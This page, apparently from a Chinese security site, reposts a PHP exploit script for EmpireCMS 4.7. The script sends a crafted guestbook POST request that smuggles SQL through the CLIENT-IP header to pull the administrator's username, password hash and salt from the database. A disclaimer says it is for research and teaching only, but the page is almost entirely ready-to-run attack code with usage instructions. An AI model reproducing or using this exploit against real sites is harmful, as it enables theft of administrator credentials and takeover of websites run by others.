EmpireCMS47 sqlinject 's

admin 2017年4月25日22:50:53评论210 views字数 1480阅读4分56秒阅读模式
<?php print_r(" +------------------------------------------------------------------+ Exploit For EmpireCMS47 Just work as php>=5&mysql>=4.1 BY  t00ls.net +------------------------------------------------------------------+ ");  if ($argc<3) { echo "Usage: php ".$argv[0]." host path /n"; echo "host:      target server /n"; echo "path:      path to EmpireCMS47/n"; echo "Example:/r/n"; echo "php ".$argv[0]." localhost //n"; die; } $host=$argv[1]; $path=$argv[2]; $data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook"; $cmd = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where  userid=1),'',1,'1111',0,0,'')/*"; $message = "POST ".$path."/e/enews/index.php"." HTTP/1.1/r/n"; $message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1/r/n"; $message .= "Accept-Language: zh-cn/r/n"; $message .= "Content-Type: application/x-www-form-urlencoded/r/n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n"; $message .= "CLIENT-IP: $cmd/r/n"; $message .= "Host: $host/r/n"; $message .= "Content-Length: ".strlen($data)."/r/n"; $message .= "Cookie: ecmsgbookbid=1;/r/n"; $message .= "Connection: Close/r/n"; $message .= "/r/n"; $message .=$data; $ock=fsockopen($host,80); if (!$ock) { echo 'No response from '.$host; die; } echo "[+]connected to the site!/r/n"; echo "[+]sending data now……/r/n"; fputs($ock,$message); @$resp =''; while ($ock && !feof($ock)) $resp .= fread($ock, 1024);  echo $resp;  echo "[+]done!/r/n"; echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash,good luck" ?>

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月25日22:50:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   EmpireCMS47 sqlinject 'shttps://cn-sec.com/archives/45590.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息